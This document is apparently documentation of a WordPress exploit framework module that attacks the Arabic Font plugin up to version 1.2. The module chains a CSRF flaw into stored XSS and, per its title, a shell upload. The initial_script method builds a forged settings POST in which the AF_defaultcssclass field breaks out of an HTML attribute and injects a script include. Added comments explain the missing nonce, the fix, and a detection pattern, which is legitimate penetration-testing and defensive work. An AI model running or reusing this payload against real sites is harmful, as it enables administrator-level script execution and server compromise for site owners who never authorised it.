class Wpxf::Exploit::ArabicFontCsrfStoredXssShellUpload

Public Class Methods

new()
# File lib/wpxf/modules/exploit/xss/stored/arabic_font_csrf_stored_xss_shell_upload.rb, line 6
# Runs the parent initialiser, then registers this module's metadata
# (title, author, advisory references and date) through update_info.
#
# Defender note: the title scopes the issue to Arabic Font 1.2 and earlier,
# and the references below point at the public advisory. Use them to confirm
# whether an installed copy of the plugin is in the affected range.
def initialize
  super

  # Public advisory identifiers for this issue.
  advisories = [
    %w[WPVDB 8868],
    ['URL', 'https://www.rastating.com/arabic-font-1-2-csrf-stored-xss']
  ]

  update_info(
    name: 'Arabic Font <= 1.2 CSRF Stored XSS Shell Upload',
    author: ['rastating'], # Discovery + WPXF module
    references: advisories,
    date: 'Jul 18 2017'
  )
end

Public Instance Methods

check()
# File lib/wpxf/modules/exploit/xss/stored/arabic_font_csrf_stored_xss_shell_upload.rb, line 22
# Delegates the vulnerability check to check_plugin_version_from_readme for
# the 'arabic-font' plugin, passing '1.2.1' as the version argument.
#
# NOTE(review): '1.2.1' is presumably the first fixed release, which would
# match the "<= 1.2" range in the module title. Confirm against the helper.
# A readme-based version check is a fingerprint, not proof: the result is
# only as trustworthy as the readme served by the site.
#
# @return whatever check_plugin_version_from_readme returns
def check
  plugin_slug = 'arabic-font'
  version_bound = '1.2.1'

  check_plugin_version_from_readme(plugin_slug, version_bound)
end
initial_script()
# File lib/wpxf/modules/exploit/xss/stored/arabic_font_csrf_stored_xss_shell_upload.rb, line 26
# Returns the result of create_basic_post_script for a POST to the plugin's
# settings page (admin.php?page=arabic-font/inc/init.php) carrying the
# "save" action and the form fields listed below.
#
# Defender notes:
# * No nonce/token field appears in the submitted fields, which matches the
#   CSRF classification in the module title. The fix on the plugin side is
#   to require and verify a nonce (and a capability check) on this action.
# * AF_defaultcssclass is the only field that carries markup. The stored-XSS
#   part of the advisory implies the saved value is later rendered without
#   attribute escaping (inferred from the title, confirm in the advisory).
#   Escaping on output and validating the value as a CSS class name on save
#   both close it.
# * For detection, look for settings-save requests to this page whose
#   AF_defaultcssclass value contains angle brackets or quotes.
def initial_script
  # Evaluated in the same order as the original argument list: URL first,
  # then the interpolated field value.
  settings_page = normalize_uri(wordpress_url_admin, 'admin.php?page=arabic-font%2Finc%2Finit.php')
  default_css_class = ".arab\\\"><script>#{xss_ascii_encoded_include_script}<\\/script><input+type=\\\"hidden\\\"+value=\\\""

  create_basic_post_script(
    settings_page,
    'save1'              => 'Save changes',
    'AF_fontfamily'      => 'JF Flat Jozoor',
    'AF_fontsize'        => '18',
    'AF_lineheight'      => '45',
    'AF_textalign'       => 'Center',
    'AF_defaultcssclass' => default_css_class,
    'AF_customcss'       => '',
    'action'             => 'save'
  )
end